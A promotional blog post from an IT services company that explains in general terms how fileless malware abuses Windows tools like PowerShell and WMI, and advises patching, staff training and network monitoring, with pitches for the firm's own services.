NEWS FROM THE EDGE

Tech Tips and Advice from the Experts at Dynamic Edge

Why Fileless Malware Is Worrying Security Experts

fileless-malwareThe big attack gaining traction among cyber attackers that may strike your business is hard to detect.

It’s nothing new. Fileless malware has been around for quite some time, but its popularity is quickly growing among cyber criminals with targets on business networks.

Because it’s stealthy, efficient and very capable of evading many of the conventional security systems many businesses have in place (like antivirus and conventional firewalls), fileless malware is becoming the ‘go-to’ for attacks on enterprise-grade systems.

Today I want to spend a few minutes on why fileless malware has become so big in the cybercrime community and what you can do to protect yourself from becoming the next organization to fall to its devastating effects.

But first, what exactly is fileless malware?

Unlike traditional malware, fileless variants don’t rely on any installation of software on a target machine. Rather, the virus is added to a built-in tool within your operating system (in most cases, targeting Windows), which is then hijacked by the criminal to carry out an attack. You can sort of think of this type of attack as Windows being brainwashed to turn against itself.

The real heart of the problem with fileless malware is that there is no signature for antivirus to detect a virus. And even though antivirus and detection software have become more sophisticated at identifying malicious activity, the reality is that detecting fileless malware continues to be quite challenging.

How does fileless malware run?

Basically, fileless malware attacks target default Windows tools—specifically PowerShell and Windows Management Instrumentation (WMI)—and use them to carry out specific commands during the attack. PowerShell and Windows Management Instrumentation are frequently used by IT teams to automate tasks across a network to make it easy to maintain entire networks of computers. They are very commonly used across standard IT workflows, which makes banning use of them or removing the software considerably harder than you’d initially think.

Since attackers are exploiting legitimate programs in their efforts to attack your network, they are almost always undetected by the majority of security programs and antivirus software in production today.

The real problem with attackers exploiting PowerShell or WMI is that both programs have near carte-blanche access on each machine their installed, allowing a criminal nearly complete admin access to everything on your network.

Today, fileless malware represents over half of attempted attacks. Since this type of attack doesn’t rely on installing code, it’s ideal for larger networks and for stealthy transmission across networks.

How can you prevent a fileless malware attack?

Patching your network—basic network hygiene is one of the easiest ways to prevent fileless malware from penetrating your network from the beginning. The problem most organizations have is that their IT teams are too busy fighting fires that they overlook essential tasks of maintaining secure networks. Nearly every business I’ve audited in the past 6 months has had at least 5 vulnerabilities that put them at nearly 60 times the risk of getting infected with a ransomware virus. Making sure your patches are up-to-date and updates are consistently tested is one of the surest ways your business will not get infected.

Training your team—the second-most popular way cyber criminals are penetrating networks and infecting them with their fileless malware is through phishing emails and social engineering tactics. Team members are quite easily tricked into giving up passwords, sensitive information or clicking or downloading attachments in emails that contain the virus. Getting them to understand and identify scams is more critical than ever. [Note: we provide FREE cybersecurity training every other month. Call and ask about how you can attend!]

Monitoring your network’s perimeter for suspicious activity—even though antivirus and conventional security tools are unable to detect malicious fileless malware activity, heuristic-based traffic detection can certainly block attacks from becoming disastrous. Having protection that understands normal network activity and gauges for abnormal activity even in common applications like WMI or PowerShell could help you detect and prevent a massive ransomware attack from hitting your business. [Ask us how fitSecure could keep your team safe!].

One of the most common misconceptions in the business community is that “I’m safe because I have antivirus” or “something like this will never happen to me”. The cold reality is that criminals are targeting business networks with greater force in 2018 than ever before. And the ones that think they’re safe are the easiest targets because their IT guys are likely not diligently monitoring their networks and probably aren’t educating their users about attacks that antivirus will never detect.

Are you certain your business is secure? Contact us TODAY for a free 37-point ransomware assessment.

0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments